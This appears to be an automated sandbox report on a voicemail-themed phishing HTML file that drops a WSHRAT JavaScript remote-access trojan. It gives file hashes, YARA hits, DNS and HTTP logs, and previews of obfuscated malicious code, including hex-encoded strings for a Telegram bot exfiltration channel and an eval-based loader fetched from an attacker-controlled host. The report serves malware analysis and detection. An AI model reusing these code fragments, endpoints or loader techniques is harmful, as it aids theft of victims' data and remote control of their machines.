	mexicodatingloverforchildern.jpg.vbs	Get hash	malicious	Unknown	Browse	104.21.25.148
	itBEKxL3Gw.exe	Get hash	malicious	Unknown	Browse	104.21.25.148
	SR-968_Equip_Matl_WDS_rev.Aa_04302024.exe	Get hash	malicious	GuLoader	Browse	104.21.25.148
	ouTBFyJGN3.exe	Get hash	malicious	Djvu, PrivateLoader, Vidar	Browse	104.21.25.148
	NEW PURCHASE ORDER.exe	Get hash	malicious	GuLoader	Browse	104.21.25.148
	02.03.2023--ZA860 Order 428278 vom.exe	Get hash	malicious	GuLoader	Browse	104.21.25.148

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	789
Entropy (8bit):	4.700988784695684
Encrypted:	false
SSDEEP:	24:UCAeEYFCAeE+mLr2fK2gHm/KoF+xk2A7NLPg:UCAeZCAeXfRgHm/KoFeG7NPg
MD5:	F83D14BDE41AE81F4CDF864966B5D460
SHA1:	EDF103C7E3E7EE1B667F24E6CAA04324A723AD96
SHA-256:	D1C2C9E550EE1404BF64E2B99A8426C4457A5E28186F42A8112BEF2221734354
SHA-512:	872C36EDBC4BB4649C4D30A0EF8853CB19F109DA442364B5A8B382621B4613127E60842BC169C79EA077970BBCA8E5D06F1340CFFB30FA109BC826DD71383A18
Malicious:	false
Preview:	{. "ip": "81.181.62.34",. "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti",. "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti",. "hostname": "81.181.62.34",. "latitude": 44.4626,. "longitude": 26.0737,. "postal_code": "011455",. "city": "Bucuresti (Sector 1)",. "country_code": "RO",. "country_name": "Romania",. "continent_code": "EU",. "continent_name": "Europe",. "region": "Bucure\u0219ti",. "district": "Municipiul Bucure\u015fti",. "timezone_name": "Europe\/Bucharest",. "connection_type": "Corporate",. "asn_number": 0,. "asn_org": "",. "asn": "",. "currency_code": "RON",. "currency_name": "Romanian Leu",. "success": true,. "premium": false.}

Process:	C:\Windows\System32\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	789
Entropy (8bit):	4.700988784695684
Encrypted:	false
SSDEEP:	24:UCAeEYFCAeE+mLr2fK2gHm/KoF+xk2A7NLPg:UCAeZCAeXfRgHm/KoFeG7NPg
MD5:	F83D14BDE41AE81F4CDF864966B5D460
SHA1:	EDF103C7E3E7EE1B667F24E6CAA04324A723AD96
SHA-256:	D1C2C9E550EE1404BF64E2B99A8426C4457A5E28186F42A8112BEF2221734354
SHA-512:	872C36EDBC4BB4649C4D30A0EF8853CB19F109DA442364B5A8B382621B4613127E60842BC169C79EA077970BBCA8E5D06F1340CFFB30FA109BC826DD71383A18
Malicious:	false
Preview:	{. "ip": "81.181.62.34",. "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti",. "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti",. "hostname": "81.181.62.34",. "latitude": 44.4626,. "longitude": 26.0737,. "postal_code": "011455",. "city": "Bucuresti (Sector 1)",. "country_code": "RO",. "country_name": "Romania",. "continent_code": "EU",. "continent_name": "Europe",. "region": "Bucure\u0219ti",. "district": "Municipiul Bucure\u015fti",. "timezone_name": "Europe\/Bucharest",. "connection_type": "Corporate",. "asn_number": 0,. "asn_org": "",. "asn": "",. "currency_code": "RON",. "currency_name": "Romanian Leu",. "success": true,. "premium": false.}

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with very long lines (65534), with CRLF line terminators
Category:	dropped
Size (bytes):	631649
Entropy (8bit):	3.6197110064206117
Encrypted:	false
SSDEEP:	12288:MYeIrWr/qRigAyX/kngXFbjTLvaH28nZH19Iimg0VtxWvTbxzOObcizI/mofdEMZ:MYeIrWr/qRigAyX/kngXFbjTLvaH28n8
MD5:	67AE1F3636DF193B2B7897BC536FCF76
SHA1:	F3A94059ADECC0DE3615EBE2FB7DF65599B3361B
SHA-256:	043DF4E99AEAA6F5873B0CF3DEC2694D5B8D1F4830B37C9E2A5FC16953BACCF5
SHA-512:	2C0E76588A79F88036D51A4E628BF8120CA36A3C788B5066004955E0C2BE855AA8B5EE357E9B2332D5957CE3C6DA23D63539FA0EB730596E08A3574A180093C1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, Author: ditekSHen
Preview:	..var _$_348b=["\x41\x53\x38\x35\x37\x35","\x52\x55","\x28","\x29","\x6F\x62\x6A\x65\x63\x74","\x73\x74\x72\x69\x6E\x67","\x22","","\x22\x3A","\x5B","\x7B","\x5D","\x7D","\x36\x39\x36\x38\x31\x32\x36\x34\x36\x38\x3A\x41\x41\x46\x42\x75\x63\x46\x30\x55\x6D\x68\x6D\x4B\x4D\x70\x5F\x52\x67\x43\x4A\x57\x4A\x56\x43\x37\x68\x6A\x47\x41\x4F\x32\x35\x6D\x77\x67","\x36\x34\x38\x31\x32\x37\x30\x39\x30\x38","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x74\x65\x6C\x65\x67\x72\x61\x6D\x2E\x6F\x72\x67\x2F\x62\x6F\x74","\x2F\x73\x65\x6E\x64\x4D\x65\x73\x73\x61\x67\x65","\x4D\x53\x58\x4D\x4C\x32\x2E\x53\x65\x72\x76\x65\x72\x58\x4D\x4C\x48\x54\x54\x50","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x20","\x6D\x73\x78\x6D\x6C\x32\x2E\x78\x6D\x6C\x68\x74\x74\x70","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6A\x73\x6F\x6E\x2E\x67\x65\x6F\x69\x70\x6C\x6F\x6F\x6B\x75\x70\x2E\x69\x6F\x2F","\x55\x73\x65\x72\

Process:	C:\Windows\SysWOW64\unarchiver.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1497
Entropy (8bit):	5.173682920029783
Encrypted:	false
SSDEEP:	24:eFPq9tsdF+fLFNiJ7FNiJjWI7FNiJ7FNiJUwBFNiJfROYFNiJ7FNiJFTA9tsdFNA:YFCDGzGbzGzGpRGkqGzGp/tGbVGktGle
MD5:	23902E866A1C1C949D69EDFA926A6887
SHA1:	2888568E7E88C070B3E8301840147CDC4EF25927
SHA-256:	CAA0F0E89A9DB19EB250413E3A768366A6A9D080A938875825DE4E2840DE5280
SHA-512:	40C5E0CF2B814171BF99D0F36304D6B28FC302BD7610FF1C146B6EB01E1A08ED7CA2B134B918354EDCF77AAA5BF02B8A2D9E84CBBEB2452D9F3F820028E51350
Malicious:	false
Preview:	05/10/2024 9:31 PM: Unpack: C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip..05/10/2024 9:31 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\2otik2vy.ast..05/10/2024 9:31 PM: Received from standard out: ..05/10/2024 9:31 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..05/10/2024 9:31 PM: Received from standard out: ..05/10/2024 9:31 PM: Received from standard out: Scanning the drive for archives:..05/10/2024 9:31 PM: Received from standard out: 1 file, 170836 bytes (167 KiB)..05/10/2024 9:31 PM: Received from standard out: ..05/10/2024 9:31 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip..05/10/2024 9:31 PM: Received from standard out: --..05/10/2024 9:31 PM: Received from standard out: Path = C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip..05/10/2024 9:31 PM: Received from standard out: Type = zip..05/10/2024 9:31 PM: Received from standard out: Physical Size = 1

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	170836
Entropy (8bit):	7.91256626224867
Encrypted:	false
SSDEEP:	3072:8mKw5UzdVTsUTd3VKIvfH9z1JOeCSNeFXfUH1P2o8wFaLL3D/qr0WiesEXk:51GzdVrTdT3R1S8oovsT/qBlsE0
MD5:	70E4EBDBF7EE1C60A666E82BE1CCDE77
SHA1:	233B99185726FED6408F73F5884A2AFC5EFD6B9A
SHA-256:	935CB080336C30268285243B3242A5CD058C9400162E0D775D9576F585F4CC14
SHA-512:	9D2EF8B02B1C750384F3DFB2BEEF50F1750BD0161A64C5CEF0530EA19272D4E6FF34EF842BBAA5D7171DD06D0B56DC897542479C16EF8FD6521B8FC7FB530640
Malicious:	false
Preview:	PK...........X.E.c....a.......New Voicemail May 9 _mp4.js.].....J.r..I..b..e.D..k...H.....! Y.....}3....$E....@..._........k.............o...-../.........%.....do.....u.....O..oE.j...Z......s.........l..M....r..&...O5'.].......ro.0...<....._'{/.......n..z_zY.....j.rC..^...a>.....>.8.fS...M......M..t.W....t.v.....=.,..6.aE..u.nv..6/&............DN..\lQ...C.wl.?...Y.^.m.`".amb%C..:.9-.M..M...K.(..CL>..b.......S...R....iW..Y...n.-kX.....s..lJ......)..._.U.0......3F..5...:...hZ_'3.n.....rmS.......c.].ct..w....1.;+.CL....>..S.{g..k(gWC.e...]s.6....~.s..e.V...<...s.....'..j....]o......<...........@.d...\.r.]K.j.....].x....T;1..<..)(..mYU/...&..ef...0..W.).8.......m4y9...jv.M>L...$#.j#.....L..&<...hS.Vp....?`.To.G....e.........:....u.X\|....tA...e.N.F...u.I.f5 x.>.7IhB.2x..&S.:}.......>.v.0..C_.Q......6...i..q9...6Q ......m ..fGu4...S}.,-.Jy..0...y8....M....F.u0)..Kyo...>..KU`$..$..j...R...}..g...Zo..s....`\|..;.....8.......b..vQ...

File type:	HTML document, Unicode text, UTF-8 text, with very long lines (1766), with CRLF line terminators
Entropy (8bit):	5.140058542366128
TrID:	HyperText Markup Language (13003/1) 100.00%
File name:	Voicemail Jud.html
File size:	4'291 bytes
MD5:	3d9479b1e6201aa32a6b812f02482b38
SHA1:	5c595ea2e25dd799e11a31e7df0d5744de21ff58
SHA256:	427fb9938ca75db1a362fe51356a1dc06350daa5f9db788a4ca2f7e2cb21fd34
SHA512:	89aa917bce011a1876cc4e0af2919105d5d8ef520a1d0f2dcb674ed75b79fc8e35b5af0a0491574134649c4a126b711159479c5f2b7b5f2771979ff12400dc94
SSDEEP:	48:kmphS5NZ0qHEwkAckAmSsVvw5jR+zfNNv9m/qal+7DlZuKfBqRb8UFJyK/YuDklK:oTZ0qfCZsdwdR+zTI+7ZwYcnguX
TLSH:	8C91A662D9C1105AA273416095E2678DFE104193D7078F5D75AC22A79FF3CC6ACB3684
File Content Preview:	..<script>..var rrc="SkNDQnVkZ2V0U2VydmljZXNDb250YWN0c1RyaWFsQ291cnRzQGp1ZC5jYS5nb3Y=";..</script>....<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">...... .. <title>Sign \| Voicemail</title>.. <link rel="ico

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2024 21:31:19.483375072 CEST	57119	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:19.483557940 CEST	62348	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:19.483761072 CEST	61772	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:19.483869076 CEST	50394	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:19.578659058 CEST	53	50127	1.1.1.1	192.168.2.4
May 10, 2024 21:31:19.593794107 CEST	53	57119	1.1.1.1	192.168.2.4
May 10, 2024 21:31:19.594252110 CEST	53	55152	1.1.1.1	192.168.2.4
May 10, 2024 21:31:19.594307899 CEST	53	62348	1.1.1.1	192.168.2.4
May 10, 2024 21:31:19.600738049 CEST	53	50394	1.1.1.1	192.168.2.4
May 10, 2024 21:31:19.600750923 CEST	53	61772	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.238571882 CEST	53	60178	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.388797045 CEST	63294	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:20.388936996 CEST	59948	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:20.431579113 CEST	55102	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:20.431684017 CEST	49974	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:20.499593019 CEST	53	63294	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.502906084 CEST	53	59948	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.542145967 CEST	53	55102	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.547149897 CEST	53	49974	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.549015045 CEST	55730	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:20.549341917 CEST	55324	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:20.660717010 CEST	53	55324	1.1.1.1	192.168.2.4
May 10, 2024 21:31:20.662300110 CEST	53	55730	1.1.1.1	192.168.2.4
May 10, 2024 21:31:21.166368008 CEST	53294	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:21.166523933 CEST	52304	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:21.279463053 CEST	53	53294	1.1.1.1	192.168.2.4
May 10, 2024 21:31:21.279489994 CEST	53	52304	1.1.1.1	192.168.2.4
May 10, 2024 21:31:23.433830023 CEST	60244	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:23.433950901 CEST	49787	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:23.543646097 CEST	53	49787	1.1.1.1	192.168.2.4
May 10, 2024 21:31:23.543875933 CEST	53	60244	1.1.1.1	192.168.2.4
May 10, 2024 21:31:35.621798992 CEST	138	138	192.168.2.4	192.168.2.255
May 10, 2024 21:31:37.227451086 CEST	53	60011	1.1.1.1	192.168.2.4
May 10, 2024 21:31:41.133702993 CEST	53	51090	1.1.1.1	192.168.2.4
May 10, 2024 21:31:42.135518074 CEST	55991	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:42.135519028 CEST	54638	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:42.245965004 CEST	53	55991	1.1.1.1	192.168.2.4
May 10, 2024 21:31:42.246177912 CEST	53	54638	1.1.1.1	192.168.2.4
May 10, 2024 21:31:42.982045889 CEST	49216	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:42.982287884 CEST	53125	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:42.984981060 CEST	55183	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:42.985354900 CEST	60891	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:43.096662998 CEST	53	55183	1.1.1.1	192.168.2.4
May 10, 2024 21:31:43.097346067 CEST	53	60891	1.1.1.1	192.168.2.4
May 10, 2024 21:31:43.160751104 CEST	53	49216	1.1.1.1	192.168.2.4
May 10, 2024 21:31:43.160839081 CEST	53	53125	1.1.1.1	192.168.2.4
May 10, 2024 21:31:43.731159925 CEST	54149	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:43.731343031 CEST	60828	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:43.912166119 CEST	53	54149	1.1.1.1	192.168.2.4
May 10, 2024 21:31:44.061434031 CEST	53	60828	1.1.1.1	192.168.2.4
May 10, 2024 21:31:46.944494009 CEST	53741	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:46.944904089 CEST	63798	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:47.060944080 CEST	53	53741	1.1.1.1	192.168.2.4
May 10, 2024 21:31:47.064610004 CEST	53	63798	1.1.1.1	192.168.2.4
May 10, 2024 21:31:49.217966080 CEST	50533	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:49.218264103 CEST	51460	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:49.334319115 CEST	53	51460	1.1.1.1	192.168.2.4
May 10, 2024 21:31:49.334867001 CEST	53	50533	1.1.1.1	192.168.2.4
May 10, 2024 21:31:49.855717897 CEST	64466	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:49.856436968 CEST	51793	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:49.966116905 CEST	53	64466	1.1.1.1	192.168.2.4
May 10, 2024 21:31:49.978686094 CEST	53	51793	1.1.1.1	192.168.2.4
May 10, 2024 21:31:52.660814047 CEST	62039	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:52.771214962 CEST	53	62039	1.1.1.1	192.168.2.4
May 10, 2024 21:31:53.452764034 CEST	60800	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:53.563273907 CEST	53	60800	1.1.1.1	192.168.2.4
May 10, 2024 21:31:54.482214928 CEST	64025	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:54.594366074 CEST	53	64025	1.1.1.1	192.168.2.4
May 10, 2024 21:31:56.029400110 CEST	53	50793	1.1.1.1	192.168.2.4
May 10, 2024 21:31:59.529443026 CEST	63650	53	192.168.2.4	1.1.1.1
May 10, 2024 21:31:59.640077114 CEST	53	63650	1.1.1.1	192.168.2.4
May 10, 2024 21:31:59.988934040 CEST	62688	53	192.168.2.4	1.1.1.1
May 10, 2024 21:32:00.129236937 CEST	53	62688	1.1.1.1	192.168.2.4
May 10, 2024 21:32:19.139353991 CEST	53	52801	1.1.1.1	192.168.2.4
May 10, 2024 21:32:19.146502972 CEST	53	57497	1.1.1.1	192.168.2.4
May 10, 2024 21:32:32.054040909 CEST	62271	53	192.168.2.4	1.1.1.1
May 10, 2024 21:32:32.200031996 CEST	53	62271	1.1.1.1	192.168.2.4
May 10, 2024 21:32:47.305927992 CEST	53	49226	1.1.1.1	192.168.2.4
May 10, 2024 21:33:02.350794077 CEST	55029	53	192.168.2.4	1.1.1.1
May 10, 2024 21:33:02.492476940 CEST	53	55029	1.1.1.1	192.168.2.4
May 10, 2024 21:33:32.601463079 CEST	53	55764	1.1.1.1	192.168.2.4
May 10, 2024 21:33:47.585015059 CEST	57046	53	192.168.2.4	1.1.1.1
May 10, 2024 21:33:47.723910093 CEST	53	57046	1.1.1.1	192.168.2.4
May 10, 2024 21:34:13.975737095 CEST	55574	53	192.168.2.4	1.1.1.1
May 10, 2024 21:34:14.123692036 CEST	53	55574	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
May 10, 2024 21:31:54.705554962 CEST	182	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
May 10, 2024 21:31:54.834064960 CEST	472	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 May 2024 19:31:54 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 10 May 2024 20:31:54 GMT Location: https://pastebin.com/raw/NsQ5qTHr Server: cloudflare CF-RAY: 881c5a2b4dcce263-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
May 10, 2024 21:31:58.589097023 CEST	182	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
May 10, 2024 21:31:58.711167097 CEST	472	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 May 2024 19:31:58 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 10 May 2024 20:31:58 GMT Location: https://pastebin.com/raw/NsQ5qTHr Server: cloudflare CF-RAY: 881c5a438ae96369-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
May 10, 2024 21:31:59.767064095 CEST	262	OUT	GET /json/ HTTP/1.1 Accept: / user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive
May 10, 2024 21:31:59.954896927 CEST	485	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:58 GMT Content-Type: application/json; charset=utf-8 Content-Length: 308 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 49 4c 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 7a 69 70 22 3a 22 36 30 36 36 36 22 2c 22 6c 61 74 22 3a 34 31 2e 38 37 38 31 2c 22 6c 6f 6e 22 3a 2d 38 37 2e 36 32 39 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 42 69 6e 62 6f 78 20 47 6c 6f 62 61 6c 20 53 65 72 76 69 63 65 73 20 53 52 4c 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"IL","regionName":"Illinois","city":"Chicago","zip":"60666","lat":41.8781,"lon":-87.6298,"timezone":"America/Chicago","isp":"Datacamp Limited","org":"Binbox Global Services SRL","as":"AS212238 Datacamp Limited","query":"81.181.62.34"}

Timestamp	Bytes transferred	Direction	Data
May 10, 2024 21:32:33.483195066 CEST	182	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
May 10, 2024 21:32:33.609822989 CEST	472	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 May 2024 19:32:33 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 10 May 2024 20:32:33 GMT Location: https://pastebin.com/raw/NsQ5qTHr Server: cloudflare CF-RAY: 881c5b1dab4f0262-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:19 UTC	492	OUT	GET /love.js HTTP/1.1 Host: cloudgoogle.pages.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:20 UTC	763	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:20 GMT Content-Type: application/javascript Content-Length: 45489 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: "2c5b5471075b46345d4110e63c2192fe" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jYQyg%2FlDRXR7qfNXdx3zMsVknuX5HoxFDkZ4ExZiX6zl11hXW2QSK%2BqbHm89h0qnj3uGxwZES5GA1%2FqsRZ0Ugc6jaZWj3CaPq%2BKraKkoeEOnA%2B69SVVJ0GyxVPx%2Bx4HCd0oSyMMLoQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c59524970112e-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:20 UTC	606	IN	Data Raw: 2f 2f 20 4a 6f 62 20 49 44 3a 20 6e 71 33 78 6c 68 39 6b 66 65 35 73 0d 0a 6c 65 74 20 72 66 4b 4f 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 67 6e 39 46 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 65 76 61 6c 28 22 28 66 75 6e 63 74 69 6f 6e 20 4d 58 4a 46 28 76 64 52 78 29 7b 63 6f 6e 73 74 20 58 4b 54 78 3d 66 58 41 79 28 76 64 52 78 2c 76 66 6f 79 28 4d 58 4a 46 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 3b 74 72 79 7b 6c 65 74 20 72 38 4c 78 3d 65 76 61 6c 28 58 4b 54 78 29 3b 72 65 74 75 72 6e 20 72 38 4c 78 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 67 6e 39 46 29 3b 7d 63 61 74 63 68 28 54 46 4f 78 29 7b 76 61 72 20 54 48 6c 79 3d 28 30 6f 32 30 33 35 Data Ascii: // Job ID: nq3xlh9kfe5slet rfKO;!function(){const gn9F=Array.prototype.slice.call(arguments);return eval("(function MXJF(vdRx){const XKTx=fXAy(vdRx,vfoy(MXJF.toString()));try{let r8Lx=eval(XKTx);return r8Lx.apply(null,gn9F);}catch(TFOx){var THly=(0o2035
